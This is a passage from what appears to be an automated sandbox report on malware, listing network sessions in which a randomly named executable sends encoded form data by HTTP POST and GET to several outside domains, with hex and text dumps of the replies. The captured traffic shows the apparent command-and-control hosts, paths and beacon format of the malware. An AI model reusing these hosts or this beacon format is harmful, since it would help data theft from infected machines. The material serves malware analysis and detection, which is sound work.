                                                                            Data Ascii: idTDev6P=3mBp5/R5122skRd0nj3Gpf3X38XI4Lr3dOvvCEHm+0uZOwrFO+TEtxHDjdtcKsbWAT50GW5UjFkTQzgbzobqgZLZVtjzCvM0X1Jw/qW3a5DAjvOxtCfwv6MN4OXOgnp8NmN4lkeHaR5mMnJn/WIiaQCxzfNwiasoM1xNtAgxxMHchL1iE+LBLOQqFcwQZ61WGxXK/Kc4yj5GArP8s/R2TDBoLynoKghl0Wc35nK0bs9d2kOVyfQc1A8EVZq8uWBpQ1ydhD9V/PxmBTiTWOCh9cRYPzncZ+C2XKS1+Gt7un7iij2bcVri7wdnfII8qdvkoJ11v6CFVbVlchXeC5pbDoUTuMgjBP7DLTU7FN+enqAqN3HSSRo0srhAojlRN7KWuhzthemMVgfsJA0y3re8W8VJExLROBYnzHYW2HipWp3g/dS+oBqiBGHK9FQokBrGq14PFEJkZ/p8ppTb1NPMfDmAc6vfvsVciYXMRG6cYukBOcZGfPMukfRw1HzWKPVsHZNbzz08APkPv0U7k35oYJrRZbyxSXi4WjalTLjQPKf5L2jb0x/WWJnai9egtbZiGNZvRDXG1UCR+/MlQR1yF3x597O02wbCERbWcuSAs6r1wtv+V1y9kj66L9SxQkm1B/30OM217oZNaSuOM2TSLwuoavgd/YpP/c242Q42MrZiHXhWWtwJS1ZBBDD7X00r3B9rl+vstQ8lDXiueJ9gqg1sPExGdqUuM6z2zNM9ULfi1j8TM/GChp5VlDiQJN/s5fIkif+aiubZy57DygcL7KxWqdTZqEoORoyLGwKkW11XtettO37y03yymsXHtUf7lNuJzfuBGqlpap8oA2fMSwelY79B7QEon32TDk0wMg5G+Q+dPqhdJdK7uWF21pFI+Z3nYJoHDTPYDbjJFD6sASI5Dmks+LnB/zr28BYBtClu92AhyPIjNjWXnIWYYTS2Cu5fVnAauPRQsc/2YRMmPeZz0muvEAnyyFGph6JMGt+ [TRUNCATED]
                                                                            Jan 13, 2025 10:21:36.131838083 CET1236INHTTP/1.1 200 OK
                                                                            date: Mon, 13 Jan 2025 09:21:35 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1102
                                                                            x-request-id: cd494186-940f-4e93-a9eb-73d5199c583b
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==
                                                                            set-cookie: parking_session=cd494186-940f-4e93-a9eb-73d5199c583b; expires=Mon, 13 Jan 2025 09:36:36 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Jan 13, 2025 10:21:36.131860018 CET555INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2Q0OTQxODYtOTQwZi00ZTkzLWE5ZWItNzNkNTE5OWM1ODNiIiwicGFnZV90aW1lIjoxNzM2NzYwMD


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.2.450036199.59.243.228802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:38.250113010 CET463OUTGET /gott/?z2=LHT8eHbp3J&idTDev6P=6kpJ6LpNwGTQjQFo3QTaoLrj/KP09pa+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhrL8LPD7Y+8AZWFZ/qadVKHEgd+qnz3Eias= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.sql.dance
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Jan 13, 2025 10:21:38.712024927 CET1236INHTTP/1.1 200 OK
                                                                            date: Mon, 13 Jan 2025 09:21:38 GMT
                                                                            content-type: text/html; charset=utf-8
                                                                            content-length: 1458
                                                                            x-request-id: 0f96613e-d6df-456d-9cb3-7e66cb075adb
                                                                            cache-control: no-store, max-age=0
                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                            vary: sec-ch-prefers-color-scheme
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QbuOysDjo+vRemzpFz3BuwKTMqE6ihnIq/9EA4yMDV+y2blbgmMtxak3EjvnlKI9fzkWiaLhQCd6dbLzgA15rA==
                                                                            set-cookie: parking_session=0f96613e-d6df-456d-9cb3-7e66cb075adb; expires=Mon, 13 Jan 2025 09:36:38 GMT; path=/
                                                                            connection: close
                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 62 75 4f 79 73 44 6a 6f 2b 76 52 65 6d 7a 70 46 7a 33 42 75 77 4b 54 4d 71 45 36 69 68 6e 49 71 2f 39 45 41 34 79 4d 44 56 2b 79 32 62 6c 62 67 6d 4d 74 78 61 6b 33 45 6a 76 6e 6c 4b 49 39 66 7a 6b 57 69 61 4c 68 51 43 64 36 64 62 4c 7a 67 41 31 35 72 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QbuOysDjo+vRemzpFz3BuwKTMqE6ihnIq/9EA4yMDV+y2blbgmMtxak3EjvnlKI9fzkWiaLhQCd6dbLzgA15rA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                            Jan 13, 2025 10:21:38.712049961 CET911INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGY5NjYxM2UtZDZkZi00NTZkLTljYjMtN2U2NmNiMDc1YWRiIiwicGFnZV90aW1lIjoxNzM2NzYwMD


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.2.45003738.22.89.164802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:44.042407990 CET741OUTPOST /ucix/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.811371bb10.buzz
                                                                            Origin: http://www.811371bb10.buzz
                                                                            Referer: http://www.811371bb10.buzz/ucix/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 45 6b 75 61 35 6e 75 61 53 45 34 6d 59 55 62 43 77 51 76 37 66 73 47 44 46 54 6b 76 50 53 53 4d 41 76 52 78 57 69 53 4d 72 70 47 70 73 7a 67 74 42 32 37 44 4e 54 4e 62 6a 34 75 48 55 2f 6c 77 6f 53 53 65 4c 31 69 72 51 70 63 32 69 44 75 44 37 4b 57 77 67 4d 64 69 78 67 79 4a 44 78 30 68 7a 71 63 6c 34 74 35 44 62 73 32 77 36 6d 32 4e 70 72 6e 79 4a 48 61 6c 35 45 67 30 64 63 6d 62 30 37 77 61 71 44 4b 75 69 70 49 76 39 64 42 6b 6f 71 4c 77 4f 74 71 55 6d 79 4e 58 66 44 7a 4f 64 65 47 48 79 6c 51 5a 38 56 30 4c 57 61 2f 31 55 69 62 61 4e 67 3d 3d
                                                                            Data Ascii: idTDev6P=CtoA+mPmz+J/Ekua5nuaSE4mYUbCwQv7fsGDFTkvPSSMAvRxWiSMrpGpszgtB27DNTNbj4uHU/lwoSSeL1irQpc2iDuD7KWwgMdixgyJDx0hzqcl4t5Dbs2w6m2NprnyJHal5Eg0dcmb07waqDKuipIv9dBkoqLwOtqUmyNXfDzOdeGHylQZ8V0LWa/1UibaNg==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.2.45003838.22.89.164802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:46.603822947 CET761OUTPOST /ucix/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.811371bb10.buzz
                                                                            Origin: http://www.811371bb10.buzz
                                                                            Referer: http://www.811371bb10.buzz/ucix/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 57 56 65 61 2b 77 36 61 44 30 34 6c 64 55 62 43 70 41 76 2f 66 73 36 44 46 52 49 2f 54 30 36 4d 41 4b 39 78 58 6d 47 4d 73 70 47 70 6e 54 67 53 4d 57 37 49 4e 55 46 39 6a 35 53 48 55 2f 68 77 6f 58 32 65 58 53 4f 6f 54 5a 63 34 33 7a 75 42 31 71 57 77 67 4d 64 69 78 67 6d 76 44 78 38 68 7a 59 49 6c 36 4d 35 45 57 4d 32 78 39 6d 32 4e 74 72 6e 32 4a 48 61 69 35 42 42 5a 64 65 65 62 30 34 6b 61 71 53 4b 68 6f 70 49 31 69 74 41 31 34 37 53 2f 49 50 7a 2b 6b 77 56 51 51 7a 32 76 59 59 4c 64 6a 55 78 4f 75 56 51 34 4c 64 32 42 5a 68 6d 54 57 67 4b 53 68 70 35 51 30 65 6c 35 43 6f 49 38 6e 39 6d 30 69 6f 6b 3d
                                                                            Data Ascii: idTDev6P=CtoA+mPmz+J/WVea+w6aD04ldUbCpAv/fs6DFRI/T06MAK9xXmGMspGpnTgSMW7INUF9j5SHU/hwoX2eXSOoTZc43zuB1qWwgMdixgmvDx8hzYIl6M5EWM2x9m2Ntrn2JHai5BBZdeeb04kaqSKhopI1itA147S/IPz+kwVQQz2vYYLdjUxOuVQ4Ld2BZhmTWgKShp5Q0el5CoI8n9m0iok=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.2.45003938.22.89.164802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:49.223630905 CET10843OUTPOST /ucix/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.811371bb10.buzz
                                                                            Origin: http://www.811371bb10.buzz
                                                                            Referer: http://www.811371bb10.buzz/ucix/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 10305
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 57 56 65 61 2b 77 36 61 44 30 34 6c 64 55 62 43 70 41 76 2f 66 73 36 44 46 52 49 2f 54 30 79 4d 42 38 70 78 57 42 36 4d 74 70 47 70 71 7a 67 54 4d 57 37 5a 4e 53 74 35 6a 35 65 39 55 39 70 77 79 78 36 65 48 6e 36 6f 49 70 63 34 6f 6a 75 45 37 4b 57 66 67 4e 74 6d 78 6a 65 76 44 78 38 68 7a 5a 34 6c 7a 39 35 45 46 63 32 77 36 6d 32 52 70 72 6e 65 4a 48 43 55 35 42 4e 76 63 75 2b 62 31 59 30 61 6f 67 69 68 67 70 49 7a 6a 74 41 74 34 37 76 2f 49 50 76 59 6b 78 68 32 51 78 71 76 56 65 65 71 38 6e 68 6b 79 48 4d 37 65 39 4f 64 42 67 79 76 5a 43 4f 64 77 63 31 71 73 4f 6b 62 48 4a 31 65 30 38 71 51 67 49 46 41 68 48 6b 6f 34 42 36 54 2b 67 37 51 4d 49 55 51 58 62 50 76 71 63 48 58 79 4c 2b 6b 56 67 74 6b 79 6b 54 77 71 5a 42 44 68 35 48 4f 4c 70 4a 75 46 44 64 56 4a 67 4f 4b 38 6f 2b 41 38 6b 75 71 39 6b 61 41 45 65 52 64 49 4c 48 44 61 42 48 4c 46 6c 72 37 73 4d 78 6f 4b 48 57 37 52 63 6f 6e 6e 6a 6e 30 6a 78 62 47 41 38 69 4d 6c 32 42 79 6d [TRUNCATED]
                                                                            Data Ascii: idTDev6P=CtoA+mPmz+J/WVea+w6aD04ldUbCpAv/fs6DFRI/T0yMB8pxWB6MtpGpqzgTMW7ZNSt5j5e9U9pwyx6eHn6oIpc4ojuE7KWfgNtmxjevDx8hzZ4lz95EFc2w6m2RprneJHCU5BNvcu+b1Y0aogihgpIzjtAt47v/IPvYkxh2QxqvVeeq8nhkyHM7e9OdBgyvZCOdwc1qsOkbHJ1e08qQgIFAhHko4B6T+g7QMIUQXbPvqcHXyL+kVgtkykTwqZBDh5HOLpJuFDdVJgOK8o+A8kuq9kaAEeRdILHDaBHLFlr7sMxoKHW7Rconnjn0jxbGA8iMl2BymwqVj4OHDhkK/inRdsZSsNGGF6Uk1oxcrn6zu+jFaiLzdIqTG1Vm4mXRvyM4CBRb7xVOTkw1UZKYplIX6uULB6iRwPsfs4/K4g2uVin39a3BeeaCEQBdG0BdnEc9UDWA7lE3956RpNeZA9sCyvsuB4O1ekPcYJzPHvnhFCOHX1lbIPNwVKaE9wRVDTdpALhRWdpNRGT3LXLB72yyUu5WTs4sFL3+jOIYa7k7u+8dbHSXYjeumQfkRWvmjlMd4cgMMoeYr6qsFi8YC0uj11iJbhEAjbN+jMnjN0OF8eXCewdwBg09CcNzgP9JE3F9GCpNk5KupBUmXElcxqIux2hyG/xgbijeIA7d6MSLIe+73KrS7vG7DsYANKYa2Vg234WhlhHS/mi66MWd9e3ON9Mpp5/WwQEB/M/xyJrDrtkzID/FTeOSEjgISSfcnhJRP2Fy88akLW5CeB/npphFJH3DzXmVWzbIcr6WI+94zUvMyP72L8QCAZQ+cF6xEucOX2+z1IfDd9DKlElTuQ5v/G/DUOgdWdB+Xt4LjRmaFfa7jjieTy1lU3pfMOY80Ub+CtbHJnS7jplst5Rm/5iAcO6o1BAeXkhTHLGZSREv20K2hM67af/jtJiwQVtL6BAHV5d7O7yY6OCFOovqsolkGYMbI0M9FpZjhGtnOzO [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            36192.168.2.45004038.22.89.164802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:21:51.827770948 CET469OUTGET /ucix/?idTDev6P=PvAg9QCS6Z5JTHKbpS7nTnQEYV78sBmDdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOIQKoTuDn9aElepw412NEgoxxpo789p/RNg=&z2=LHT8eHbp3J HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.811371bb10.buzz
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            37192.168.2.45004168.65.122.71802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:18.201894045 CET729OUTPOST /csd1/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.rtp189z.lat
                                                                            Origin: http://www.rtp189z.lat
                                                                            Referer: http://www.rtp189z.lat/csd1/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 205
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
                                                                            Data Raw: 69 64 54 44 65 76 36 50 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 45 5a 7a 66 59 47 39 45 36 32 59 63 69 75 48 4c 69 66 34 39 2b 30 33 70 39 68 43 46 64 59 76 6e 7a 31 69 66 74 36 46 72 69 43 59 39 45 30 65 2b 45 6c 56 70 46 51 65 68 42 4c 73 68 53 39 39 6b 4f 53 30 76 41 4f 42 51 65 78 67 34 77 42 4f 2b 70 57 32 67 41 4e 4e 55 68 44 63 5a 75 37 77 57 71 36 4a 79 58 75 37 41 33 52 52 46 50 2f 51 32 43 35 36 56 66 65 39 4a 31 67 66 61 77 4b 73 56 51 59 78 43 57 69 6c 45 77 73 6b 63 52 55 2f 61 36 63 58 65 67 7a 48 78 38 65 61 49 78 4d 38 75 66 5a 2f 62 43 36 39 47 46 57 45 34 72 30 2b 69 7a 4e 56 33 69 67 3d 3d
                                                                            Data Ascii: idTDev6P=5jf2zjfdd87cEZzfYG9E62YciuHLif49+03p9hCFdYvnz1ift6FriCY9E0e+ElVpFQehBLshS99kOS0vAOBQexg4wBO+pW2gANNUhDcZu7wWq6JyXu7A3RRFP/Q2C56Vfe9J1gfawKsVQYxCWilEwskcRU/a6cXegzHx8eaIxM8ufZ/bC69GFWE4r0+izNV3ig==
                                                                            Jan 13, 2025 10:22:19.123142004 CET1236INHTTP/1.1 404 Not Found
                                                                            keep-alive: timeout=5, max=100
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Mon, 13 Jan 2025 09:22:18 GMT
                                                                            server: LiteSpeed
                                                                            x-turbo-charged-by: LiteSpeed
                                                                            connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-col
                                                                            Jan 13, 2025 10:22:19.123167038 CET316INData Raw: 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
                                                                            Data Ascii: or:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such,


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            38192.168.2.45004268.65.122.71802784C:\Program Files (x86)\HzrXHFwxLKryWVfGaBUguKadrydOWMfQzAWhSSUyrsXaMAJbRSofMEqUCTED\vtTdsKSTqQr.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 13, 2025 10:22:20.753727913 CET749OUTPOST /csd1/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Host: www.rtp189z.lat
                                                                            Origin: http://www.rtp189z.lat
                                                                            Referer: http://www.rtp189z.lat/csd1/
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Content-Length: 225
                                                                            Cache-Control: no-cache
                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
